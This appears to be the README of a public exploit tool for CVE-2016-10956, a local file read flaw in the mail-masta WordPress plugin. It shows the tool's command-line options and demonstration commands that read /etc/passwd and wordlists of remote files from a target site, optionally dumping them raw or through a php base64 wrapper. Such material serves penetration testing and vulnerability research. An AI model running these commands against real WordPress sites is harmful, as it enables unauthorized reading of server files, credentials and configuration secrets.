Mail Masta - Local File Read (CVE-2016-10956)

The mail-masta plugin 1.0 for WordPress has local file read in count_of_send.php and csvexport.php.

Usage

$ ./CVE-2016-10956_mail_masta.py -h
[+] Mail Masta - Local File Read (CVE-2016-10956)

usage: CVE-2016-10956_mail_masta.py [-h] [-v] [-s] -t TARGET_URL [-f FILE | -F FILELIST] [-D DUMP_DIR] [-k] [-r]

Description message

optional arguments:
  -h, --help            show this help message and exit
  -v, --verbose         Verbose mode
  -s, --only-success    Only print successful read file attempts.
  -t TARGET_URL, --target TARGET_URL
                        URL of the wordpress to connect to.
  -f FILE, --file FILE  Remote file to read.
  -F FILELIST, --filelist FILELIST
                        File containing a list of paths to files to read remotely.
  -D DUMP_DIR, --dump-dir DUMP_DIR
                        Directory where the dumped files will be stored.
  -k, --insecure        Allow insecure server connections when using SSL (default: False)
  -r, --raw             Raw dump of the file without php base64 wrapper (default: False)

Demonstration

Read a specific remote file

./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -f /etc/passwd

Read specific remote files from a wordlist

./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -F wordlist

Read specific remote files from a wordlist and only printing found files

./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -F wordlist --only-success

References

• https://nvd.nist.gov/vuln/detail/CVE-2016-10956
• https://cxsecurity.com/issue/WLB-2016080220
• https://wordpress.org/plugins/mail-masta/#developers
• https://wpvulndb.com/vulnerabilities/8609